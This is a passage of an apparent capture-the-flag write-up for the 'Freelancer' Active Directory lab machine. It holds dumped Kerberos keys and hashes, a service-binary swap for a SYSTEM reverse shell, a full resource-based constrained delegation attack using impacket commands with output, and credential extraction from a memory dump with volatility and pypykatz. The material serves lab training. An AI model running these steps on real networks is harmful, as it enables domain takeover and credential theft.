freelancer.com\liza.kazanof:aes256-cts-hmac-sha1-96:a94dbc4a7ebb95ab4973b1e75e380a4a1744a8391215e3449a61b915abc6bf68
freelancer.com\liza.kazanof:aes128-cts-hmac-sha1-96:542c428dd68dd2b4da662d18cfd6e60e
freelancer.com\liza.kazanof:des-cbc-md5:da512fe980c88551
DC$:aes256-cts-hmac-sha1-96:561edbca437df7878b890f544efd54ed5a86443cf658ddd313ffb33464c537fe
DC$:aes128-cts-hmac-sha1-96:fb08d27ee4139adcb6a2cc33745af2f3
DC$:des-cbc-md5:67c85d34a708e334
DATACENTER-2019$:aes256-cts-hmac-sha1-96:87ed12bf74dbd8e3cf0f12e7c5de9537dcc35ed889950d14b0f9e753545a808c
DATACENTER-2019$:aes128-cts-hmac-sha1-96:aa9becc6a8437c4f4b4ca56a9230634a
DATACENTER-2019$:des-cbc-md5:615d43ce97e61370
DATAC2-2022$:aes256-cts-hmac-sha1-96:b5d0c7873946a3910780851a0922034facec03a4a083700b8724ccb0ba99bdce
DATAC2-2022$:aes128-cts-hmac-sha1-96:163fdfc01621c567a9bb041bbda1bb3e
DATAC2-2022$:des-cbc-md5:078376a249862f32
WS1-WIIN10$:aes256-cts-hmac-sha1-96:509bc5affbf4f45619b1fe8e9e236f14286e2a1fc9435b84747a8e8e440e2dec
WS1-WIIN10$:aes128-cts-hmac-sha1-96:01a1553fd3358136c6b5421bcb1b7f89
WS1-WIIN10$:des-cbc-md5:a19b2a8976ce0b9e
WS2-WIN11$:aes256-cts-hmac-sha1-96:7848ba3e99fab92b8308556b7520ce578d055441a1f6d63b54fb170f7ee4f960
WS2-WIN11$:aes128-cts-hmac-sha1-96:60f5f618548447a64bbe1b9cad7c2776
WS2-WIN11$:des-cbc-md5:d60825d9bcc14340
WS3-WIN11$:aes256-cts-hmac-sha1-96:8b6f4c958a3de942761e09175683dedbbd034d52d8128ce2a96db1fb44611301
WS3-WIN11$:aes128-cts-hmac-sha1-96:e62e2a9cbb2832548c0d52dc05ff3ba1
WS3-WIN11$:des-cbc-md5:387f80ce91f792a2
DC2$:aes256-cts-hmac-sha1-96:ff2dedd696532b956c6cdd47f09ecd175b9c6a167827b75cd4fa2e5312570848
DC2$:aes128-cts-hmac-sha1-96:5e3c61366b67de3cfe990ca87962bc1b
DC2$:des-cbc-md5:f170198c9d4c2a29
SETUPMACHINE$:aes256-cts-hmac-sha1-96:b88fcc7fe204621b2b3b911a1db4c458fafe7ac3ef57302962461b9ce3db243a
SETUPMACHINE$:aes128-cts-hmac-sha1-96:118aa6b399016d4eed23e3bc680616f7
SETUPMACHINE$:des-cbc-md5:b3e56483b052c2ab
[*] Cleaning up...

Unintended ways…

Server Operators

The user jmartinez is part of the Server Operators group and therefore able to modify services and backup / restore files thanks to the SeBackup and SeRestore privileges6.

First I find services that run as the LocalSystem and then replace the service binary of an unimportant service like VM3DService or VMTools with a malicious binary / script, that grants a reverse shell as NT Authority\System.

# Find services running as LocalSystem
Get-WmiObject Win32_Service | Where-Object { $_.StartName -eq "LocalSystem" } | Select-Object Name, StartName
 
# Stop a service
sc.exe stop VM3DService
 
SERVICE_NAME: VM3DService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
 
# Replace the binary
sc.exe config VM3DService binPath= "C:\tools\shell.bat"
[SC] ChangeServiceConfig SUCCESS
 
# Start the service again
sc.exe start VM3DService
[SC] StartService FAILED 1053:
 
The service did not respond to the start or control request in a timely fashion.

Instead of modifying services, I can also put the granted privileges to good use. Besides the method shown with liza.kazanof and dumping the registry hives, the SeBackup and SeRestore can also be used to bypass ACLs when accessing or copying files. A simple cp will not work though, because the file has to be opened with FILE_FLAG_BACKUP_SEMANTICS7. This can either be achieved with a backup software, like robocopy or this PowerShell cmdlet.

Resource-Based Constrained Delegation

The user lorra199 has a Generic Write on the Domain Controller and therefore can modify the attributes on the Domain Controller. This attack works by adding a new computer account to the domain (by default everyone can add up to 10) and then abuse the Generic Write to add the computer into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the Domain Controller. Then it’s possible to request a new service ticket on behalf of the Administrator (or any other user), to be used to authenticate on the DC or just dump all the hashes via secretsdump.

impacket-addcomputer -computer-name 'RYUKI$' -computer-pass 'Helloworld123!' -dc-ip 10.129.229.97 'FREELANCER.HTB/lorra199:Helloworld123!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Successfully added machine account RYUKI$ with password Helloworld123!.
 
impacket-rbcd -delegate-from 'RYUKI$' -delegate-to 'DC$' -dc-ip 10.129.229.97 -action 'write' 'FREELANCER.HTB/lorra199:Helloworld123!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] RYUKI$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     RYUKI$       (S-1-5-21-3542429192-2036945976-3483670807-12101)
 
impacket-getST -spn CIFS/DC.freelancer.htb -impersonate Administrator -dc-ip 10.129.229.97 'FREELANCER/RYUKI$:Helloworld123!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_DC.freelancer.htb@FREELANCER.HTB.ccache
 
export KRB5CCNAME=Administrator@CIFS_DC.freelancer.htb@FREELANCER.HTB.ccache
 
impacket-wmiexec -no-pass -k dc.freelancer.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
freelancer\administrator
 
impacket-secretsdump -no-pass -k dc.freelancer.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x9db1404806f026092ec95ba23ead445b
--- SNIP ---

Attack Path

flowchart TD

subgraph "Initial access"
    A(Create Deactivated Employer Account) -->|Reset Password| B(Access as Employer)
    B -->|Modify ID in QR Access Code| C(Access as Admin)
    C -->|Interactive SQL Terminal| D(Impersonate sa in MSSQL)
end

subgraph "Execution"
    D -->|xp_cmdshell| E(Access as svc_sql)
end

subgraph "Privilege Escalation"
    E -->|Password Spray| F(Access as mikasaAckerman)
    F -->|Memory Dump Analysis| G(Hashes and Passwords)
    G -->|Password Spray| H(Access as lorra199)
    H -->|Restore Object from AD Recycle Bin| I(Access as liza.kazanof)
    G -->|Valid NTLM Hash| I
    I -->|"SeBackup Privilege\nDump Hashes from Registry"| J(Access as Administrator)
end

subgraph "Unintended"
    G -->|Password Spray with extended combinations| M(Access to 20 Accounts)
    M -->|Reset Password as Account Operator| P(Access as lorra199)
    M -->|Valid Password| N(Access as jmartinez)
    N -->|"Server Operators\nModifying service"| O(Access as NT Authority\System)
    P -->|"Generic Write on DC\nRBCD"| J
end

Addendum

Volatility

When the box was released, the memory dump could not be parsed with volatility3. When trying to do so and bumping up the verbosity to at least 6 (-vvvvvv) it tried to access a non-existing index while parsing the crash layer and therefore abort. Wrapping the offending code in a try-except block circumvents that problem.

try:
    if (buffer_char[bit_addr >> 3] >> (bit_addr & 0x7)) & 1:
        if first_bit is None:
            first_offset = offset
            first_bit = bit_addr
        offset = offset + 0x1000
    else:
        if first_bit is not None:
            segment_length = (
                (bit_addr - 1) - first_bit + 1
            ) * 0x1000
            segments.append(
                (
                    first_bit * 0x1000,
                    first_offset,
                    segment_length,
                    segment_length,
                )
            )
            first_bit = None
except:
    continue

This was fixed properly in version 2.7.2 and therefore the same memory image can be parsed with a recent version of volatility3.

First I install volatility3 and the plugin pypykatz in a virtual environment.

# Create a new virtual environment
python3 -m venv venv
 
# Activate the venv
source venv/bin/activate
 
# Clone the repository
git clone https://github.com/volatilityfoundation/volatility3 && cd volatility3
 
# Install the requirements
pip install -r requirements.txt
 
# Install the plugin for pypykatz
git clone https://github.com/skelsec/pypykatz-volatility3
 
# Install the dependencies
pip install 'pypykatz>=0.3.3

Then I use the plugins windows.lsadump, windows.cachedump, windows.hashdump, and pypykatz to dump the credentials from the memory dump.

python vol.py -f MEMORY.DMP windows.lsadump
--- SNIP ---
_SC_MSSQL$DATA  *PWN3D#l0rr@Armessa199  2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 57 00 4e 00 33 00 44 00 23 00 6c 00 30 00 72 00 72 00 40 00 41 00 72 00 6d 00 65 00 73 00 73 00 61 00 31 00 39 00 39 00 00 00 00 00 00 00
_SC_SQLTELEMETRY$DATA|Ñ¢[{vMA=UKÒ#Íq¼]¶ãqb{°*6L°00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 7b 76 86 4d 05 41 93 3d 55 4b d2 23 cd 71 09
 
python vol.py -f MEMORY.DMP windows.hashdump
Volatility 3 Framework 2.10.0
Progress:  100.00               PDB scanning finished                                
User    rid     lmhash  nthash
 
Administrator   500     aad3b435b51404eeaad3b435b51404ee        725180474a181356e53f4fe3dffac527
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount  503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount      504     aad3b435b51404eeaad3b435b51404ee        04fc56dd3ee3165e966ed04ea791d7a7
 
python3 vol.py -f MEMORY.DMP windows.cachedump
Volatility 3 Framework 2.10.0
Progress:  100.00               PDB scanning finished                                
Username        Domain  Domain name     Hash
 
Administrator   FREELANCER      FREELANCER.HTB  67 a0 c0 f1 93 ab d9 32 b5 5f b8 91 66 92 c3 61
lorra199        FREELANCER      FREELANCER.HTB  7c e8 08 b7 8e 75 a5 74 71 35 cf 53 dc 6a c3 b1
liza.kazanof    FREELANCER      FREELANCER.HTB  ec d6 e5 32 22 4c ca d2 ab cf 23 69 cc b8 b6 79
 
python vol.py -f MEMORY.DMP -p pypykatz-volatility3 pypykatz
Volatility 3 Framework 2.10.0
ERROR    pypykatz    : Failed to prcess TSPKG package! Reason: Page Fault at entry 0x0 in table page directory
 
credtype        domainname      username        NThash  LMHash  SHAHash masterkey       masterkey(sha1) key_guid        password
 
msv     Window Manager  DWM-1   1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv     FREELANCER      DATACENTER-2019$        1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
msv     Font Driver Host        UMFD-1  1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv     Font Driver Host        UMFD-0  1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv     FREELANCER      Administrator   acb3617b6b9da5dc7778092bdea6f3b8                ccbee099f360c2fd26b8a3953d9b37893bcaa467
kerberos        FREELANCER.HTB  Administrator                                                   v3ryS0l!dP@sswd#29
msv     FREELANCER      liza.kazanof    6bc05d2a5ebf34f5b563ff233199dc5a                93eff904639f3b40b0f05f9052c48473ecd2757e
dpapi                                           e88b706951f959a337fdf1a4d2eb5c61505435464ebdf135eb33105155da02279ca34659ac5892fe35302fa8695a35e0db93fdfa08f08b18d4e30f2db01e2e38        04c39947e3b7bc21c381e0cf757cf62c1927b1b2        b3859cd0-59d2-4857-8a5f-98d469e5d8d2
msv     Window Manager  DWM-1   1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv                     1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
dpapi                                           182ec41e8b2b2b36200887fe41dfc5f71b73c2b619ec79c0510056b4bf777e151f31d18a435b5d91aeaf7db6be46c278ed315b68dd6c318b5745f9c5bf9473e3        acdef27600c7f4abc37bb3eb70b53e4db9c4fd34        bb43c14f-ceb3-4470-849a-af15c76aac4a
dpapi                                           d8201d9b1dd265a4c7f8a69a808d8755c9912c386feb6bf379e08d41cdb6d26b749dda3e31c0a538139c564263769cd4deb6c274b0b9d16d2a301a4d72d7d50c        4970c224ef4b328f76ff6deb742511cec404cbe8        981d16b3-c818-4a7e-82fe-1206e42b6c72
dpapi                                           95e2ae7fd5c84c8e5bb19665661286fc54c6dec7ebe820ce1a74e359374f4f75f6c3275333be7ad14931a238ce64708f6160af90ba0ae2f82b4d653a6a96132e        5d73afc8ef9e38f6cf5a5cc3a6f4208ea21852a9        57db84cf-ea9c-45a1-a6e8-d618821e181e
dpapi                                           ca76b946db6b85cbe497c531122ca25d333e0e5aa7d5a6251c420d9816f2583fafac661734d33edd00e1ffb1bd273403583e82a085a78d75f29bac7bb6fc4401        38da8205a8861bda9d616adb6af7189963cb5fb1        1d1cfc42-9fc7-49bb-b834-9e0600d6e152

MemProcFS

Instead of volatility and mimikatz, MemProcFS and its plugins can be used to examine the memory dump in a filesystem like setting.

I download the tool from the releases page on Github and extract the contents, then I repeat the steps for the plugins and place the folders in files/plugins into the plugins folder of memprocfs. Python is already installed on my machine and I just need to get the dependencies for the plugins through pip install dissect.cstruct pypykatz aiowinreg.

After running memprocfs.exe -device "MEMORY.DMP" the contents of the memory dump are mounted on M: and I can browse the files. Within registry/hive_files I can access the different hives and could use secretsdump to dump the credentials, but I don’t really have to because the previously installed plugins did that job for me. The extracted credentials are already present in M:\py\regsecrets.

Screenshot of a Windows VM with a running memprocfs in the background, several files with credentials in the explorer and a text editor with credentials highlighted

Footnotes

  1. Impersonation of other users

  2. Memdumps, Volatility, Mimikatz, VMs – Part 3: WinDBG Mimikatz Extension

  3. Account Operators

  4. The AD Recycle Bin: Understanding, Implementing, Best Practices, and Troubleshooting

  5. Restore-ADObject

  6. Server Operators

  7. CreateFileA function

Recent ...